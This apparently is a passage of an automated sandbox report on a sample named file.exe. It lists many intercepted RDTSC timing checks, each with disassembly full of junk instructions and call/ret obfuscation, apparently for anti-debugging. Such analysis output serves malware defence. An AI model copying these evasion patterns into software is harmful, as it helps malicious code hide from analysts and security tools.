                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A10C4D second address: A10CA2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pop edx 0x00000006 pop eax 0x00000007 nop 0x00000008 mov di, 1BF7h 0x0000000c push 00000000h 0x0000000e mov edi, dword ptr [ebp+122D3741h] 0x00000014 call 00007FB9C8FCBE99h 0x00000019 pushad 0x0000001a jne 00007FB9C8FCBE9Ch 0x00000020 jl 00007FB9C8FCBE9Ch 0x00000026 ja 00007FB9C8FCBE96h 0x0000002c popad 0x0000002d push eax 0x0000002e ja 00007FB9C8FCBEA4h 0x00000034 mov eax, dword ptr [esp+04h] 0x00000038 push eax 0x00000039 push edx 0x0000003a push ecx 0x0000003b push eax 0x0000003c push edx 0x0000003d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A10CA2 second address: A10CA7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A10CA7 second address: A10CAD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A10CAD second address: A10CB1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A10CB1 second address: A10CCB instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [eax] 0x0000000a push esi 0x0000000b push eax 0x0000000c pushad 0x0000000d popad 0x0000000e pop eax 0x0000000f pop esi 0x00000010 mov dword ptr [esp+04h], eax 0x00000014 push ecx 0x00000015 pushad 0x00000016 pushad 0x00000017 popad 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A10DBA second address: A10DE4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jmp 00007FB9C8FCDCB9h 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jo 00007FB9C8FCDCACh 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A10DE4 second address: A10DE8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A10DE8 second address: A10DEF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A10DEF second address: A10E61 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 nop 0x00000008 xor esi, 7DFE8C7Ah 0x0000000e push 00000000h 0x00000010 push 00000000h 0x00000012 push eax 0x00000013 call 00007FB9C8FCBE98h 0x00000018 pop eax 0x00000019 mov dword ptr [esp+04h], eax 0x0000001d add dword ptr [esp+04h], 0000001Ch 0x00000025 inc eax 0x00000026 push eax 0x00000027 ret 0x00000028 pop eax 0x00000029 ret 0x0000002a cmc 0x0000002b push 1E54A966h 0x00000030 push ecx 0x00000031 jg 00007FB9C8FCBE98h 0x00000037 pop ecx 0x00000038 xor dword ptr [esp], 1E54A9E6h 0x0000003f add ecx, 19E00CCFh 0x00000045 push 00000003h 0x00000047 xor dword ptr [ebp+122D1B5Bh], edx 0x0000004d push 00000000h 0x0000004f mov dword ptr [ebp+122D2E8Ch], eax 0x00000055 push 00000003h 0x00000057 call 00007FB9C8FCBE99h 0x0000005c push eax 0x0000005d push edx 0x0000005e push ecx 0x0000005f pushad 0x00000060 popad 0x00000061 pop ecx 0x00000062 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A10F6E second address: A10FE3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 push edi 0x00000008 pop edi 0x00000009 pop ebx 0x0000000a popad 0x0000000b nop 0x0000000c mov ch, ah 0x0000000e mov dword ptr [ebp+122D3079h], esi 0x00000014 push 00000000h 0x00000016 je 00007FB9C8FCDCB9h 0x0000001c push eax 0x0000001d jmp 00007FB9C8FCDCB1h 0x00000022 pop edi 0x00000023 xor dword ptr [ebp+122D31C2h], ebx 0x00000029 push B4B24740h 0x0000002e jc 00007FB9C8FCDCACh 0x00000034 pushad 0x00000035 pushad 0x00000036 popad 0x00000037 push edi 0x00000038 pop edi 0x00000039 popad 0x0000003a add dword ptr [esp], 4B4DB940h 0x00000041 sub dword ptr [ebp+122D33B7h], edx 0x00000047 push 00000003h 0x00000049 mov cl, al 0x0000004b push 00000000h 0x0000004d mov cx, dx 0x00000050 push 00000003h 0x00000052 mov ch, 00h 0x00000054 mov esi, dword ptr [ebp+122D37DDh] 0x0000005a call 00007FB9C8FCDCA9h 0x0000005f push eax 0x00000060 push edx 0x00000061 push eax 0x00000062 push edx 0x00000063 push eax 0x00000064 pop eax 0x00000065 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A10FE3 second address: A10FE9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A10FE9 second address: A10FEF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A10FEF second address: A10FF3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A10FF3 second address: A11014 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jc 00007FB9C8FCDCB6h 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A11014 second address: A11031 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [esp+04h] 0x0000000c push edx 0x0000000d jns 00007FB9C8FCBE98h 0x00000013 pushad 0x00000014 popad 0x00000015 pop edx 0x00000016 mov eax, dword ptr [eax] 0x00000018 push eax 0x00000019 push edx 0x0000001a push edx 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A11031 second address: A11036 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A11036 second address: A1103B instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A1103B second address: A11055 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov dword ptr [esp+04h], eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FB9C8FCDCACh 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A11055 second address: A11063 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FB9C8FCBE96h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d pop eax 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A11063 second address: A110F4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 pop eax 0x00000008 pushad 0x00000009 jmp 00007FB9C8FCDCB2h 0x0000000e mov edx, dword ptr [ebp+122D3891h] 0x00000014 popad 0x00000015 mov cx, B13Ah 0x00000019 lea ebx, dword ptr [ebp+12452AA8h] 0x0000001f push 00000000h 0x00000021 push eax 0x00000022 call 00007FB9C8FCDCA8h 0x00000027 pop eax 0x00000028 mov dword ptr [esp+04h], eax 0x0000002c add dword ptr [esp+04h], 0000001Bh 0x00000034 inc eax 0x00000035 push eax 0x00000036 ret 0x00000037 pop eax 0x00000038 ret 0x00000039 movsx esi, cx 0x0000003c xchg eax, ebx 0x0000003d pushad 0x0000003e jmp 00007FB9C8FCDCB2h 0x00000043 jmp 00007FB9C8FCDCB1h 0x00000048 popad 0x00000049 push eax 0x0000004a push eax 0x0000004b push edx 0x0000004c jng 00007FB9C8FCDCB6h 0x00000052 jmp 00007FB9C8FCDCB0h 0x00000057 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A110F4 second address: A110FA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A3014D second address: A30157 instructions: 0x00000000 rdtsc 0x00000002 jng 00007FB9C8FCDCA6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A30157 second address: A30171 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jc 00007FB9C8FCBEA8h 0x0000000c jmp 00007FB9C8FCBE9Ch 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A30453 second address: A3046F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FB9C8FCDCB6h 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A3046F second address: A30483 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB9C8FCBEA0h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A3083B second address: A30842 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A30842 second address: A30863 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push esi 0x00000008 push edx 0x00000009 jmp 00007FB9C8B8B516h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A30C36 second address: A30C6C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 jg 00007FB9C8D34AF2h 0x0000000b jmp 00007FB9C8D34AECh 0x00000010 push edx 0x00000011 jmp 00007FB9C8D34AEAh 0x00000016 pop edx 0x00000017 push edi 0x00000018 js 00007FB9C8D34AE6h 0x0000001e pop edi 0x0000001f popad 0x00000020 jo 00007FB9C8D34B0Ch 0x00000026 push eax 0x00000027 push edx 0x00000028 push eax 0x00000029 push edx 0x0000002a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A30C6C second address: A30C76 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007FB9C8B8B506h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A30C76 second address: A30C7A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A30C7A second address: A30C8A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jns 00007FB9C8B8B50Ch 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A30F29 second address: A30F3F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007FB9C8D34AF0h 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A2469B second address: A246A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A246A1 second address: A246A7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A02E9A second address: A02EA0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A02EA0 second address: A02EA4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A3137F second address: A3138A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop esi 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A3138A second address: A3138E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A31A1B second address: A31A34 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jmp 00007FB9C8B8B514h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A31A34 second address: A31A41 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 jne 00007FB9C8D34AE6h 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A31B7A second address: A31B82 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A31B82 second address: A31B86 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A31F52 second address: A31F56 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A31F56 second address: A31F75 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007FB9C8D34AF4h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A35D1E second address: A35D22 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A35D22 second address: A35D3E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FB9C8D34AF4h 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A3882A second address: A3882F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A38D25 second address: A38D2F instructions: 0x00000000 rdtsc 0x00000002 je 00007FB9C8D34AECh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A38D2F second address: A38D3B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A38E9F second address: A38EA5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A3CF34 second address: A3CF38 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A3CF38 second address: A3CF5B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007FB9C8D34AF7h 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A3D0F4 second address: A3D0FA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A3D252 second address: A3D285 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB9C8D34AF2h 0x00000009 pop edx 0x0000000a push eax 0x0000000b push edx 0x0000000c js 00007FB9C8D34AFAh 0x00000012 jmp 00007FB9C8D34AEEh 0x00000017 jnc 00007FB9C8D34AE6h 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A3D6B8 second address: A3D6C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push edx 0x00000006 jp 00007FB9C8B8B506h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A3D7D4 second address: A3D7DE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A3D7DE second address: A3D7E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A3D7E4 second address: A3D7E8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A3D7E8 second address: A3D829 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB9C8B8B514h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jmp 00007FB9C8B8B514h 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007FB9C8B8B510h 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A3FDFF second address: A3FE04 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A404C1 second address: A404C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A406B7 second address: A406BC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A40F98 second address: A40FA9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 popad 0x00000006 push eax 0x00000007 js 00007FB9C8B8B518h 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A417DE second address: A417E4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A417E4 second address: A417E8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A429A2 second address: A429A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A429A6 second address: A429B2 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A065BF second address: A065C3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A45502 second address: A4550D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A4526C second address: A45270 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A4550D second address: A45511 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A45E8F second address: A45E93 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A45C7B second address: A45C81 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A45E93 second address: A45E97 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A468E8 second address: A468EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A468EE second address: A468F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A468F3 second address: A468F9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A47372 second address: A47376 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A49191 second address: A49195 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A49195 second address: A4919B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A4919B second address: A491A0 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A4A0FD second address: A4A18B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop edx 0x00000006 push eax 0x00000007 jmp 00007FB9C8D34AEDh 0x0000000c nop 0x0000000d mov ebx, esi 0x0000000f push 00000000h 0x00000011 push 00000000h 0x00000013 push eax 0x00000014 call 00007FB9C8D34AE8h 0x00000019 pop eax 0x0000001a mov dword ptr [esp+04h], eax 0x0000001e add dword ptr [esp+04h], 00000015h 0x00000026 inc eax 0x00000027 push eax 0x00000028 ret 0x00000029 pop eax 0x0000002a ret 0x0000002b jl 00007FB9C8D34AFCh 0x00000031 call 00007FB9C8D34AF5h 0x00000036 pop ebx 0x00000037 jmp 00007FB9C8D34AF2h 0x0000003c push 00000000h 0x0000003e push 00000000h 0x00000040 push eax 0x00000041 call 00007FB9C8D34AE8h 0x00000046 pop eax 0x00000047 mov dword ptr [esp+04h], eax 0x0000004b add dword ptr [esp+04h], 00000014h 0x00000053 inc eax 0x00000054 push eax 0x00000055 ret 0x00000056 pop eax 0x00000057 ret 0x00000058 mov dword ptr [ebp+122D2EFBh], eax 0x0000005e push eax 0x0000005f pushad 0x00000060 push eax 0x00000061 push edx 0x00000062 push ebx 0x00000063 pop ebx 0x00000064 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A4A18B second address: A4A18F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A4A18F second address: A4A19D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jg 00007FB9C8D34AE6h 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A4A19D second address: A4A1A1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A4B1D6 second address: A4B1DC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A4C277 second address: A4C27C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A4C27C second address: A4C299 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a jmp 00007FB9C8D34AEFh 0x0000000f push eax 0x00000010 push edx 0x00000011 push edx 0x00000012 pop edx 0x00000013 rdtsc
